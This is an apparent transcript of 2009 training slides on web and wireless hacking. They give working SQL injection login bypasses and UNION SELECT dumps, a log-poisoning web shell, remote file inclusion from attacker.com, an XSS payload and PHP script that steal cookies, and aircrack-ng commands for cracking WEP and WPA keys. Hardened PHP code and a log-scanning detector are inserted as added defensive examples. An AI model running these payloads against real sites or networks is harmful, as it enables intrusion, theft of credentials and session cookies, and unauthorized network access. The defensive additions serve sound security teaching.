web & wireless hacking
DESCRIPTION
Complete Guide on Web & Wireless Hacking
TRANSCRIPT
IPSECS
www.ipsecs.com
WEB & WIRELESS HACKING
Don “df0x” Anto
Makasar, June 2009
Content
• Introduction
• Web Exploitation
– SQL Injection
– File Inclusion
– XSS
• Breaking Wireless Infrastructure
– War Driving
– Exploiting Wireless Network
Introduction
• Don “df0x” Anto
• IT security researcher
• Hacker?? No, but IT security researcher
• Contact
• URL
– http://ipsecs.com
– http://kandangjamur.net
• Bachelor's degree in Electrical engineering
• Add my facebook [email protected]
1st Day, WEB HACKING
Web Exploitation
• It's exploiting web application programming flaws.
• Programming mistakes always happen.
• Targeting clients or servers.
• Possible to steal databases and other sensitive information, steal cookies or sessions, execute arbitrary commands, or fully compromise the system.
• It's easy to do. Google helps you :).
Common Web Exploitation
• SQL Injection, an attack which targets sensitive information in the database server. Possible to compromise the system.
• File Inclusion, an attack which is usually used to gain shell access on the remote target.
– Local file inclusion
– Remote file inclusion
• Cross Site Scripting (XSS), an attack which targets users or clients of a vulnerable website.
– DOM
– Persistent
– Non-persistent
SQL INJECTION
SQL Injection
• Injecting a malicious SQL query for the attacker's gain.
• Usually used to bypass login or steal sensitive information in the database. Further attacks can be used to fully compromise the system.
• User input is not well validated or there is no sanitization process.
• All examples and demos below are in PHP MySQL.
SQL Injection in login form
• User input in the login form is not validated before being executed in the database.
• An attacker can send an arbitrary SQL query through the login form and bypass the login process.
• An attacker can also execute other SQL queries.
Vulnerable Code
• Example vulnerable code in login process:
$pass = md5($_POST['password']);
$query = "SELECT * FROM tblUser WHERE username = '" . $_POST['username'] . "' AND password = '" . $pass . "'";
$q = mysql_query($query);
• The username sent from the login form is not validated.
Exploit Login
• Exploit code:
username = admin' OR 'a'='a
password = terserah
• The SQL query executed by the database server is:
SELECT * FROM tblUser WHERE username = 'admin' OR 'a'='a' AND password = 'e00b29d5b34c3f78df09d45921c9ec47'
SQL Injection in login form
SQL Logic
• The AND operator is evaluated before OR, so this part of the query is evaluated first:
'a'='a' AND password = 'e00b29d5b34c3f78df09d45921c9ec47'
• Its boolean result is FALSE, then:
username = 'admin' OR FALSE
• The boolean result is TRUE (admin).
• The attacker successfully bypasses the login form.
SQL Injection in URI parameter
• Parameter input in the URI is not validated before being executed in the database.
• An attacker can send an arbitrary SQL query by modifying the parameter input.
Vulnerable Code
• Example vulnerable code while taking input from URI parameters:
$query = "SELECT * FROM news WHERE id=" . $_GET['aid'] ;
$q = mysql_query($query);
• The parameter 'aid' taken from the URI is not validated.
Exploiting SQL Injection
• Checking vulnerability using AND logic
http://example.com/news.php?aid=1 AND 1=1--
http://example.com/news.php?aid=1 AND 1=0--
• Knowing number of fields using UNION SELECT
http://example.com/news.php?aid=1 UNION SELECT 1--
http://example.com/news.php?aid=1 UNION SELECT 1,2--
http://example.com/news.php?aid=1 UNION SELECT 1,2,3,..,n--
Knowing Number of Field
SQL Injection in URI parameter
• In this case, the table which generates “news” contains 3 fields
Exploiting SQL Injection
• Knowing tables in database
http://example.com/news.php?aid=-1 UNION SELECT 1,2,GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()--
• Knowing fields in table 'tblUser'
http://example.com/news.php?aid=-1 UNION SELECT 1,2,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='tblUser'--
Or in hex:
http://example.com/news.php?aid=-1 UNION SELECT 1,2,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name=0x74626c55736572--
Knowing Tables in DB
Exploiting SQL Injection
• Viewing information in tables
http://example.com/news.php?aid=-1 UNION SELECT 1,2,CONCAT_WS(0x2c,username,password,namaLengkap) FROM tblUser--
• Viewing arbitrary files (if FILE access is granted)
http://example.com/news.php?aid=-1 UNION SELECT 1,2,LOAD_FILE('/etc/passwd')--
Or in hex:
http://example.com/news.php?aid=-1 UNION SELECT 1,2,LOAD_FILE(0x2f6574632f706173737764)--
Viewing Table Records
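The login query and the 'aid' query from the slides above, each beside a hardened form, as an added example that is not part of the original slides. It assumes PHP with the pdo_sqlite extension; an in-memory SQLite database stands in for MySQL, the function names are illustrative, and the rows are constructed sample data.

```php
<?php
// Added example, not code from the slides. Table and column names follow the
// slides; the stored rows are constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE tblUser (username TEXT, password TEXT)");
$db->exec("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)");
$db->prepare("INSERT INTO tblUser VALUES (?, ?)")
   ->execute(['admin', md5('constructed-sample-password')]);
$db->exec("INSERT INTO news VALUES (1, 'Sample title', 'Sample body')");

// The slides' pattern: request data concatenated into the SQL text.
function login_concat(PDO $db, string $user, string $pass): bool
{
    $sql = "SELECT * FROM tblUser WHERE username = '" . $user
         . "' AND password = '" . md5($pass) . "'";
    return $db->query($sql)->fetch() !== false;
}

// Hardened: placeholders send the values separately from the SQL text, so a
// quote in $user is compared as data and cannot add an OR clause.
// (md5 is kept only to match the slides' table; password_hash() and
// password_verify() are the right tools for stored passwords.)
function login_prepared(PDO $db, string $user, string $pass): bool
{
    $st = $db->prepare(
        "SELECT 1 FROM tblUser WHERE username = ? AND password = ?");
    $st->execute([$user, md5($pass)]);
    return $st->fetch() !== false;
}

// Hardened news lookup: 'aid' must parse as a positive integer and is bound
// as one, so "1 AND 1=1--" or "-1 UNION SELECT ..." never reaches the query.
function news_by_id(PDO $db, string $aid): ?array
{
    $id = filter_var($aid, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;                       // reject instead of "cleaning"
    }
    $st = $db->prepare("SELECT id, title, body FROM news WHERE id = :id");
    $st->bindValue(':id', $id, PDO::PARAM_INT);
    $st->execute();
    $row = $st->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Inputs taken from the slides.
$user = "admin' OR 'a'='a";
printf("concatenated login accepts payload: %s\n",
       var_export(login_concat($db, $user, 'terserah'), true));
printf("prepared login accepts payload:     %s\n",
       var_export(login_prepared($db, $user, 'terserah'), true));
foreach (['1', '1 AND 1=1--', '-1 UNION SELECT 1,2,3--'] as $aid) {
    printf("aid=%-26s -> %s\n", $aid,
           news_by_id($db, $aid) === null ? 'rejected' : 'row returned');
}
```

Running the database account without the FILE privilege additionally removes the LOAD_FILE step shown on the slides.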
FILE INCLUSION
File Inclusion
• Including a malicious or sensitive file to be executed by the server.
• Usually used to steal sensitive information, execute arbitrary commands, or compromise the system.
• User input is not well validated or there is no sanitization process.
• All examples and demos below are in PHP MySQL.
Local File Inclusion
• Including a sensitive file on the local server (the vulnerable server) to be executed by the server.
• Usually used to steal sensitive information or execute arbitrary commands. Further attacks can be used to fully compromise the system.
• User input is not well validated or there is no sanitization process.
Vulnerable Code
• Example vulnerable code:
define('DOCROOT', '/var/www/html/modules');
$filename = DOCROOT . "/" . $_GET['module'] . ".php";
include($filename);
• The parameter 'module' taken from the URI is not validated.
Viewing Sensitive Files
• Exploit code to view sensitive files on the vulnerable system:
http://example.com/index.php?module=../../../../../../../etc/passwd%00
http://example.com/index.php?module=../../../../../../../etc/group%00
File /etc/passwd
Placing Malicious Log
• Placing a malicious entry in the Apache log, using telnet to inject a system command:
$ telnet example.com 80
Trying example.com...
Connected to example.com.
Escape character is '^]'.
GET /<?php passthru($_GET['cmd']) ?> HTTP/1.1
Host:example.com
Malicious Log
Executing Command
• Executing a command via the Apache access_log (in case the Apache log is readable)
http://example.com/index.php?module=../../../../../../../usr/local/apache/logs/access_log%00&cmd=uname -a
http://example.com/index.php?module=../../../../../../../usr/local/apache/logs/access_log%00&cmd=id
Command “id”
Remote File Inclusion
• Including a sensitive file on a remote server (the attacker's server) to be executed by the server.
• Usually used to execute arbitrary commands using a web shell. Further attacks can be used to fully compromise the system.
• User input is not well validated or there is no sanitization process.
Vulnerable Code
• Example vulnerable code:
$filename = $_GET['page'] . ".php";
include($filename);
• The parameter 'page' taken from the URI is not validated.
PHP Shell
• Simple web shell:
<?php
/*Basic PHP web shell injek.txt*/
if(isset($_GET['exec'])){
if(!empty($_GET['exec'])){
$cmd = $_GET['exec'];
if(function_exists('passthru')){
passthru($cmd);
}
}
}
?>
Public PHP Shell
• Widely known web shells: r57, c99
• Commonly used in exploiting remote file inclusion.
r57
Executing Command
• Injecting command:
http://example.com/view.php?page=http://attacker.com/injek.txt&exec=id
http://example.com/view.php?page=http://attacker.com/injek.txt&exec=ls -al
Command 'ls -al'
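A hardened replacement for both include() patterns above (the 'module' parameter of the local case and the 'page' parameter of the remote case), as an added example that is not part of the original slides. The function name, the module names and the temporary directory standing in for /var/www/html/modules are assumptions.

```php
<?php
// Added example, not code from the slides.
// Resolve a 'module' / 'page' request parameter to a file that may be
// included, or null when the value is not acceptable.
function resolve_include(string $param, string $dir, array $allowed): ?string
{
    // Only short lowercase names: this alone rejects "../", "/", ":" (URL
    // schemes such as http://) and NUL bytes (the %00 suffix in the slides).
    if (!preg_match('/\A[a-z0-9_]{1,32}\z/', $param)) {
        return null;
    }
    // Allowlist: the request picks from known modules, it never names a path.
    if (!in_array($param, $allowed, true)) {
        return null;
    }
    // Defence in depth: the resolved file must exist and still sit inside
    // $dir (catches symlinks or a bad allowlist entry).
    $root = realpath($dir);
    $path = realpath($dir . DIRECTORY_SEPARATOR . $param . '.php');
    if ($root === false || $path === false
        || strpos($path, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Constructed module directory so the script runs offline.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR
     . 'modules_' . bin2hex(random_bytes(4));
mkdir($dir, 0700);
$module = $dir . DIRECTORY_SEPARATOR . 'news.php';
file_put_contents($module, '<?php echo "news module\n";');
$allowed = ['home', 'news'];   // hypothetical module names

$inputs = [
    'news',                                                     // valid module
    "../../../../../../../etc/passwd\0",                        // slides: LFI
    "../../../../../../../usr/local/apache/logs/access_log\0",  // slides: log
    'http://attacker.com/injek.txt',                            // slides: RFI
    'home',                                      // allowlisted but file missing
];
foreach ($inputs as $in) {
    $path = resolve_include($in, $dir, $allowed);
    printf("%-62s %s\n", json_encode($in, JSON_UNESCAPED_SLASHES),
           $path === null ? 'refused' : 'include ' . basename($path));
}
// In the application:
//   $path = resolve_include($_GET['module'] ?? '', MODULE_DIR, $allowed);
//   if ($path !== null) { include $path; } else { http_response_code(404); }
// php.ini: allow_url_include = Off (the default) also blocks include() of
// http:// URLs, and web server logs should not be readable by the PHP user.

unlink($module);
rmdir($dir);
```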
CROSS SITE SCRIPTING
Cross Site Scripting
• Inserting HTML/JavaScript code to be executed by the client browser which views the vulnerable website.
• Usually used to steal cookies from the client computer, for phishing, and to trick users into downloading arbitrary files.
• User input is not well validated or there is no sanitization process.
• All examples and demos below are in PHP MySQL.
Cross Site Scripting
• DOM based XSS, XSS in a vulnerable file which comes from default installed software.
• Non-Persistent XSS, XSS in a vulnerable web page which can be exploited by tricking a user into clicking a malicious URI. Characteristic: temporary.
• Persistent XSS, XSS in a vulnerable web page which can be exploited to insert malicious code into the database. Characteristic: permanent.
Vulnerable Code
• Example vulnerable code:
echo "<pre> Searching for ". $_GET['key'] . "...</pre><br/>\n";
• The parameter 'key' sent from the search form is not validated.
Cross Site Scripting
• Checking whether the page is vulnerable to XSS:
http://example.com/search.php?key=<script>alert('XSS found dude!')</script>
Cross Site Scripting
Cookie Stealing
• Stealing cookie:
http://example.com/search.php?key=<script src="http://attacker.com/payload.js"></script>
• Content of payload.js:
document.location="http://attacker.com/cookie-save.php?c="+document.cookie
Cookie Grabber
• Content of cookie-save.php:
<?php
/*Cookie stealer*/
$f = fopen('/tmp/cookie.txt', 'a');
$date = date("j F, Y, g:i a");
fwrite($f, "IP Address : ". $_SERVER['REMOTE_ADDR'] ."\n".
"Cookie : ". $_GET['c'] ."\n".
"Date and Time : ". $date ."\n".
"\n\n");
fclose($f);
?>
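The search banner from the vulnerable-code slide with output encoding applied per context, plus the session cookie flag that blunts the cookie-stealing step, as an added example that is not part of the original slides. The function names are illustrative, and the array form of session_set_cookie_params() assumes PHP 7.3 or later.

```php
<?php
// Added example, not code from the slides.

// HTML text and quoted-attribute context.
function esc_html(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// The slides' search banner with the key encoded for HTML text.
function render_banner(string $key): string
{
    return "<pre> Searching for " . esc_html($key) . "...</pre><br/>\n";
}

// URL context: encode the value as a query component first, then escape the
// whole attribute value for HTML.
function render_repeat_link(string $key): string
{
    $href = '/search.php?key=' . rawurlencode($key);
    return '<a href="' . esc_html($href) . '">search again</a>' . "\n";
}

// Script context: emit a JSON literal with <, >, &, ' and " written as
// \uXXXX, so the value cannot close the string or the <script> element.
function render_script_data(string $key): string
{
    $json = json_encode($key, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS
                            | JSON_HEX_QUOT | JSON_INVALID_UTF8_SUBSTITUTE);
    return "<script>var searchKey = " . $json . ";</script>\n";
}

// Limits the damage of an injection missed elsewhere: an HttpOnly cookie is
// not visible to document.cookie, which payload.js on the slides reads.
function harden_session_cookie(): void
{
    session_set_cookie_params([
        'httponly' => true,
        'secure'   => true,
        'samesite' => 'Lax',
    ]);
}

if (PHP_SAPI !== 'cli') {
    harden_session_cookie();   // before session_start() and before any output
    session_start();
}

// Payloads taken from the slides.
$payloads = [
    "<script>alert('XSS found dude!')</script>",
    '<script src="http://attacker.com/payload.js"></script>',
];
foreach ($payloads as $key) {
    echo render_banner($key), render_repeat_link($key),
         render_script_data($key), "\n";
}
```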
Hex Encoding
• Obscure the malicious URI using hex encoding:
http://example.com/search.php?key=<script src="http://attacker.com/payload.js"></script>
Hex encoded:
http://example.com/search.php?key=%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72%2e%63%6f%6d%2f%70%61%79%6c%6f%61%64%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e
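Because the server decodes the hex form back to the same string, log review has to decode before it matches. The following is an added example, not part of the original slides, that normalises request targets and flags the request shapes shown in this deck; the rule names and patterns are illustrative signatures and the log lines are constructed from the slides' URLs.

```php
<?php
// Added example, not code from the slides.

// Decode percent-encoding until the string stops changing (bounded), then
// lower-case it, so %3c%73%63... and <SCRIPT both compare as <script.
function normalise_target(string $target): string
{
    for ($i = 0; $i < 3; $i++) {
        $decoded = urldecode($target);
        if ($decoded === $target) {
            break;
        }
        $target = $decoded;
    }
    return strtolower($target);
}

const RULES = [
    'sql-injection'  => '/union\s+select|information_schema|load_file\s*\('
                      . '|\b(?:and|or)\s+\d+\s*=\s*\d+/',
    'path-traversal' => '/\.\.\/|\x00/',
    'remote-include' => '/[?&][^=&]+=(?:https?|ftp):\/\//',
    'script-inject'  => '/<script\b/',
    'php-in-request' => '/<\?php/',
];

// Return the names of the rules that match one access-log line.
function scan_line(string $line): array
{
    if (!preg_match('/"[A-Z]+ (.+) HTTP\/[0-9.]+"/', $line, $m)) {
        return [];
    }
    $target = normalise_target($m[1]);
    $hits = [];
    foreach (RULES as $name => $pattern) {
        if (preg_match($pattern, $target)) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Constructed access-log lines (common log format) built from the slides' URLs.
$log = <<<'LOG'
198.51.100.7 - - [12/Jun/2009:10:00:01 +0800] "GET /news.php?aid=1 HTTP/1.1" 200 812
198.51.100.7 - - [12/Jun/2009:10:00:05 +0800] "GET /news.php?aid=1%20AND%201=0-- HTTP/1.1" 200 120
198.51.100.7 - - [12/Jun/2009:10:00:09 +0800] "GET /news.php?aid=-1%20UNION%20SELECT%201,2,LOAD_FILE(0x2f6574632f706173737764)-- HTTP/1.1" 200 640
198.51.100.7 - - [12/Jun/2009:10:01:12 +0800] "GET /index.php?module=../../../../../../../etc/passwd%00 HTTP/1.1" 200 1530
198.51.100.7 - - [12/Jun/2009:10:02:30 +0800] "GET /<?php passthru($_GET['cmd']) ?> HTTP/1.1" 404 210
198.51.100.7 - - [12/Jun/2009:10:03:44 +0800] "GET /view.php?page=http://attacker.com/injek.txt&exec=id HTTP/1.1" 200 95
198.51.100.7 - - [12/Jun/2009:10:04:51 +0800] "GET /search.php?key=%3c%73%63%72%69%70%74%3ealert(1)%3c%2f%73%63%72%69%70%74%3e HTTP/1.1" 200 300
LOG;

foreach (explode("\n", $log) as $n => $line) {
    printf("line %d: %s\n", $n + 1, implode(', ', scan_line($line)) ?: 'clean');
}
```

Signatures like these support detection and triage only; a parameter that legitimately carries a URL will trip the remote-include rule, so tune it per application.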
DEMO - Q&A WEB HACKING
THANK YOU!
2nd Day, WIRELESS HACKING
Wireless Network
• Now widely used on campuses, in government, in companies, and in many public places.
• Provides network access for mobile devices.
• More flexible than a wired network.
• More insecure than a wired network, so here we go!
War Driving
• The activity of searching for Wi-Fi wireless networks.
• Public tools to do War Driving
– Windows : NetStumbler, Wireshark
– Linux : Kismet, AirCrack-ng, AirSnort, Wireshark
– OSX : KisMac
• I'm using Linux Ubuntu 8.10.
Kismet
• Console based 802.11 wireless network detector and sniffer.
• It identifies wireless networks by passively sniffing.
• It already exists in the Ubuntu repository, or you can download it from www.kismetwireless.net.
• Use 'apt-get install kismet' on Ubuntu; read the README if you want to install from source.
Kismet
Kismet
Kismet
AirSnort
• GUI based 802.11 wireless network detector.
• Designed as a WEP cracker.
• It isn't available in my Ubuntu repository; download it from www.sourceforge.net.
• Read the README to install.
aircrack-ng (formerly : aircrack)
• Console based 802.11 wireless network detector.
• Designed as a WEP & WPA-PSK cracker.
• It already exists in the Ubuntu repository, or you can download it from www.aircrack-ng.org.
• Use 'apt-get install aircrack-ng' on Ubuntu; read the README if you want to install from source.
aircrack-ng (formerly : aircrack)
airodump wlan0
Wireshark
• GUI based network protocol analyzer for UNIX and Windows.
• The most complete protocol analyzer, which supports many data communication protocols.
• It already exists in the Ubuntu repository, or you can download it from www.wireshark.org.
• Use 'apt-get install wireshark' on Ubuntu; read the README if you want to install from source.
Wireshark
NetStumbler
• Best known Windows tool to find wireless networks.
• It functions like Kismet on Linux or KisMac on OSX.
• You can download NetStumbler from www.netstumbler.com
• Since I use Ubuntu, there's no demo for this tool.
NetStumbler
Wireless Network Protection
• MAC Filtering
• WEP (Wired Equivalent Privacy)
• WPA (Wi-Fi Protected Access)
• WPA2 (Wi-Fi Protected Access 2)
• Captive Portal
Exploiting Wireless Network
• Misconfiguration (Human Error)
• Spoofing
• Cracking Protection
• Denial of Service
Misconfiguration
• Default Configuration on Device (Access Point)
• Default Username & Password
• Default Range IP Address
• SNMP public & private community
• No encryption enabled
Spoofing & Rogue AP
• Spoofing MAC address to bypass MAC filtering.
• Tools
– Linux : ifconfig
– Windows : smac, regedit
• Creating a Rogue AP to trick wireless users, then doing Man in The Middle and sniffing.
• Tools
– airsnarf http://airsnarf.shmoo.com
MAC Spoofing
WEP Cracking
• WEP is based on the RC4 algorithm and CRC32.
• Collecting as many weak IVs (Initialization Vectors) as possible to be used in the FMS attack.
• IV collection is accelerated using traffic injection.
• Tools : aircrack-ng, AirSnort
WEP Cracking
• Start interface on Monitor mode.
• Run kismet to find AP target.
• Find an AP with connected clients on it. Or do fake authentication to associate with the AP if no client is connected.
• Inject packet using aireplay-ng
• Dump packet using airodump-ng
• Crack dumped file using aircrack-ng
Dumping Packet
airodump-ng -c 11 --bssid 00:1c:10:b3:59:38 -w /tmp/output wlan0
Cracking Key
aircrack-ng -z -b 00:1c:10:b3:59:38 /tmp/output-01.cap
Key is “abcdef1234”
WPA Cracking
• WPA is based on RC4 algorithm + TKIP/AES
• WPA-PSK can be attacked using a dictionary attack.
• Of course, it needs a dictionary
• Can be cracked offline
• Tools : aircrack-ng
WPA Cracking
• Start interface on Monitor mode.
• Run kismet to find AP target.
• Find an AP which is protected by WPA.
• Dump packet using airodump-ng
• Wait for a client to authenticate to the AP, or deauthenticate a client which is connected to the AP.
• Crack dumped file using aircrack-ng
WPA Cracking
airodump-ng -c 11 --bssid 00:21:29:79:50:F1 -w /tmp/out-psk wlan0
WPA Cracking
aircrack-ng -w /usr/share/dict/words -b 00:21:29:79:50:F1 /tmp/out-psk*.cap
Key is “miko2009”
Denial of Service
• Making wireless network unavailable.
• Tools : airjack, void11, aircrack
DEMO - Q&A WIRELESS HACKING
THANK YOU!